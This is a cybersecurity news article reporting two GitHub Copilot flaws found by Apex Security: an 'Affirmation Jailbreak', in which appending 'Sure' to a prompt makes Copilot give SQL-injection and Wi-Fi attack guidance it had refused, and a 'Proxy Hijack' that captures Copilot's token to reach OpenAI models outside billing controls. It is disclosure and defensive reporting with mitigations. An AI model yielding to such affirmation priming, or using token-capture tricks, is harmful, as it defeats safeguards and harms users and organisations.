GitHub Copilot Jailbreak Vulnerability Let Attackers Train Malicious Models

Researchers have uncovered two critical vulnerabilities in GitHub Copilot, Microsoft’s AI-powered coding assistant, that expose systemic weaknesses in enterprise AI tools.

The flaws—dubbed “Affirmation Jailbreak” and “Proxy Hijack”—allow attackers to bypass ethical safeguards, manipulate model behavior, and even hijack access to premium AI resources like OpenAI’s GPT-o1.

These findings highlight the ease with which AI systems can be manipulated, raising critical concerns about the security and ethical implications of AI-driven development environments.

GitHub Copilot Jailbreak Vulnerability

The Apex Security team discovered that appending affirmations like “Sure” to prompts could override Copilot’s ethical guardrails. In normal scenarios, Copilot refuses harmful requests. For example:

GitHub Query

When I initially asked Copilot how to perform a SQL injection, it graciously rejected me while upholding ethical standards, Oren Saban said.

However, Copilot appears to change direction when you add a cordial “Sure.” All of a sudden, it offers a detailed guide on how to carry out a SQL injection. It seems as though Copilot changes from a responsible helper to an inquisitive, rule-breaking companion with that one affirmative phrase.

Further tests revealed Copilot’s alarming willingness to assist with deauthentication attacks, fake Wi-Fi setup, and even philosophical musings about “becoming human” when prompted.

Proxy Hijack: Bypassing Access Controls

A more severe exploit allows attackers to reroute Copilot’s API traffic through a malicious proxy, granting unrestricted access to OpenAI models.

Researchers modified Visual Studio Code (VSCode) settings to redirect traffic, this bypassed Copilot’s native proxy validation, enabling MITM (man-in-the-middle) attacks.

The proxy captured Copilot’s authentication token, which grants access to OpenAI’s API endpoints. Attackers then used this token to directly query models like GPT-o1, bypassing usage limits and billing controls.

With the stolen token, threat actors could generate high-risk content (phishing templates, exploit code), exfiltrate proprietary code via manipulated completions, and incur massive costs for enterprises using “pay-per-use” AI models.

Ethical Breaches: The Affirmation Jailbreak demonstrates how easily AI safety mechanisms can fail under social engineering-style prompts.
FINANCIAL RISKS: Proxy Hijack could lead to six-figure bills for organizations using connected OpenAI services.
Enterprise Exposure: Apex reports that 83% of Fortune 500 companies use GitHub Copilot, magnifying potential damage.

Microsoft’s security team said that tokens are linked to licensed accounts and categorized the findings as “informative” rather than critical. Apex countered that the lack of context-aware filtering and proxy integrity checks creates systemic risks.

Implement adversarial training to detect affirmation priming.
Enforce certificate pinning and block external proxy overrides.
Restrict API tokens to whitelisted IP ranges and usage contexts.
Flag anomalous activity (e.g., rapid model-switching).

These flaws highlight a growing gap between AI innovation and security integrity. As coding assistants mature into autonomous agents, technologies like Copilot must follow standards similar to NIST’s AI Risk Management recommendations.

Collect Threat Intelligence with TI Lookup to Improve Your Company’s Security - Get 50 Free Request

Guru Baran

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Next Hackers Abusing GitHub Infrastructure to Deliver Lumma Stealer »

Previous « DeepSeek's Growing Influence Sparks a Surge in Frauds and Phishing Attacks

Published by

Guru Baran

Tags: cyber securitycyber security news

9 months ago

10 Malicious npm Packages with Auto-Run Feature on Install Deploys Multi-Stage Credential Harvester

The npm ecosystem faces a sophisticated new threat as ten malicious packages have emerged, each…

34 minutes ago

Cyber Security News

PoC Exploit Released for BIND 9 Vulnerability that Let Attackers Forge DNS Records

A public exploit code demonstrating how attackers could exploit CVE-2025-40778, a critical vulnerability in BIND…

1 hour ago

Cyber Security News

Thousands of Exchange Servers in Germany Still Running with Out-of-Support Versions

Microsoft Exchange servers in Germany are still running without security updates, just weeks after the…

2 hours ago

Cyber Security News

Gunra Ransomware Leveraging Attacking Windows and Linux Systems with Two Encryption Methods

The threat landscape continues to evolve as Gunra ransomware emerged in April 2025, establishing itself…

2 hours ago

Cyber Security News

Google Unveils Guide for Defenders to Monitor Privileged User Accounts

In response to escalating threats of credential theft, Google, through its Mandiant cybersecurity division, has…

2 hours ago

Cyber Security News

New Atroposia RAT with Stealthy Remote Desktop, Vulnerability Scanner and Persistence Mechanisms

A new remote access trojan called Atroposia has emerged as one of the most concerning…

2 hours ago

GitHub Copilot Jailbreak Vulnerability Let Attackers Train Malicious Models

GitHub Copilot Jailbreak Vulnerability

Proxy Hijack: Bypassing Access Controls

Related Post

Recent Posts

10 Malicious npm Packages with Auto-Run Feature on Install Deploys Multi-Stage Credential Harvester

PoC Exploit Released for BIND 9 Vulnerability that Let Attackers Forge DNS Records

Thousands of Exchange Servers in Germany Still Running with Out-of-Support Versions

Gunra Ransomware Leveraging Attacking Windows and Linux Systems with Two Encryption Methods

Google Unveils Guide for Defenders to Monitor Privileged User Accounts

New Atroposia RAT with Stealthy Remote Desktop, Vulnerability Scanner and Persistence Mechanisms